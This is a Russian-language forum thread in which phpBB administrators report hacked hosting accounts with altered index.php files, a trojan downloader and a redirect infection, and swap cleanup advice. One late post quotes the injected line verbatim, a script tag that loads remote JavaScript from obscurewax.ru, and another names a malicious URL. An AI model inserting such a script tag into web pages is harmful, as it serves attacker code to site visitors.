Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[Smilley]

Спасибо большое, всё заработало. А всвязи с чем такое могло произойти чтобы впредь знать как предотвратить такое.

[Rayden]

видимо некорректное количество сообщений записалось в таблицу с форумами. Нажатие кнопки "синхро..." пересчитало все заново.

[potim]

Подцепил js.redirector.based.2 по версии dr web cureit, первый раз занес с локальной машины.
Почистился вручную, часть из пакета инсталляции, часть вручную. Убрал учетные записи в фтп-менеджере.

Через неделю новое заражение, не совсем понимаю откуда. Подозрение на хвосты с предыдущей чистки.

Пароли не храню (после первого заражения)
От провайдера поддержки нет

Кто чистился, посоветуйте на что обращать внимание?
Какое поведение у вируса, кроме движения по файлам index.* и *.js

Локально машина чистая, проверился сегодняшним CureIt!
Версия phpBB 3.0.7-PL1 спасибо.

[GVD]

Мою CPG задушили напрочь - это уже происходит совсем не так, как раньше. Прописываются или изменяют практически все файлы галереи.

[UmaCat]

Опишу что у меня
может предложите варианты.
форум phpbb 3.0.5
знаю, скажете давно не обновлял - автообновление превышает нагрузку на сервак хостера и никак не получается сделать последнее обновление (теперь уже два последних)
сегодня вечером, обнаруживаю что форум выдает ошибки, антивирус (Avast) вопит что что-то хочет на мой комп вот отсюда

http_://flying-city-2010.com//viewtopic.php\{gzip} [L] JS:Pdfka-AEP [Expl] (0)

начинаю копать через ФТП
обнаруживаю
1. все index.php во всех папках изменены текущим числом
2. везде в них присутствует /includes/hooks/index.php
3. нахожу эту папку, там какой-то файл index.php с заныканным внутри него java-script - явно зашифрованным - потому что понять что там не удалось
4. становится стремно, переименовываю папку чтобы не ссылалось, заменяю index.php на старый из комлпекта phpbb3

теперь собственно вопрос
каким образом за 4 минуты (с 13:06 до 13:10), были испорчены ВСЕ файлы на хостинге моем которые были с именем index.php
каким образом можно записать на хостинг новую папку с новым файлом, если я не заходил своим паролем на хостинг-админку уже пару месяцев (знали бы - раньше сломали бы).
другие CMS на хостинге сделаны на php-fusion - знаю система дырявая, но простая, сайты между собой не связаны ни контентом ничем больше (кроме того что хостятся на одном сервере).

Я не спрашиваю что делать - понятно что очистить все мне просто не удастся, все надо удалять
Я прошу просто помочь сделать копию БД
воможно ли подцепить версию phphbb установленную - к уже имеющейся БД?
возможны ли проблемы в самой БД?

спасибо

[MAzZY]

У Вас на компе вирус.
Действия обычные:
- проверяемся на вирусы
- меняем ВСЕ пароли
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[MIT]

сайты между собой не связаны ни контентом ничем больше (кроме того что хостятся на одном сервере)

Этого достаточно

воможно ли подцепить версию phphbb установленную - к уже имеющейся БД?

Да

возможны ли проблемы в самой БД?

Да

[UmaCat]

заменил все что было изменено вредными вирусописателями
но такое впечатление что форум закешировал страницы, как не входя в админку очистить кеш?
папка cache почищена ( там только свежий index.php и htaccess)
где еще проверить?

просто файлы заменены уже, а все равно браузер показывает что идет обращение к несуществующему файлу

[phpBB Debug] PHP Notice: in file /common.php on line 219: main(./includes/hooks/index.php) [function.main]: failed to open stream: No such file or directory

плин походу у меня в базе хрень эта прописывает
сори, пошел чиститься дальше

[Rayden]

где еще проверить?

Очисть таблицу phpbb_styles_template_data

includes/hooks/index.php

Проверь наличие файла. Лучше замени чистым и дистрибутива.

[UmaCat]

Всем, спасибо
восстановился.
CureIt нашел кейлоггера на компе.
возможно из-за него

но все равно не понятно, почему умный чел-хакер повредил ВСЕ файлы index.php которые имели хоть какое-то отношение к CMS/форумам (разные - php-fusion / e107/ phpbb3 ) а также все файлы с именем main.php, но при этом совершенно не тронул файлы index.php которые отвечали только за редирект.

странно мне это, это же если за 4 минуты все было сделано явно делалось скриптом, логики не могу найти, неужели в скрипт запихали инфу о большинстве CMS/форумах?

Еще раз спасибо

[Addict]

Не стоит хранить пароли в фтп-клиентах.

[Nekstati]

И в браузерах не стоит. И на бумажках тоже. Надо тренировать память. Санитар, уведите пациента.

[crash]

только пароль написаный фломастером на экране монитора спасет отца русской демократии

[Leviafant]

Форумом давно не занимаюсь, стоит 3.0.4
вот такой код дописан в индексовых файлах, рад всех разочаровать, я пользуюсь линуксом
видимо уязвимость все же в скрипте форума

Код: Выделить всё

<script type="text/javascript" src="http://obscurewax.ru/URL.js"></script>
<!--cfae47f881e849f7bf3261c16b6b917c-->

[MIT]

Криворукость страшна под любой осью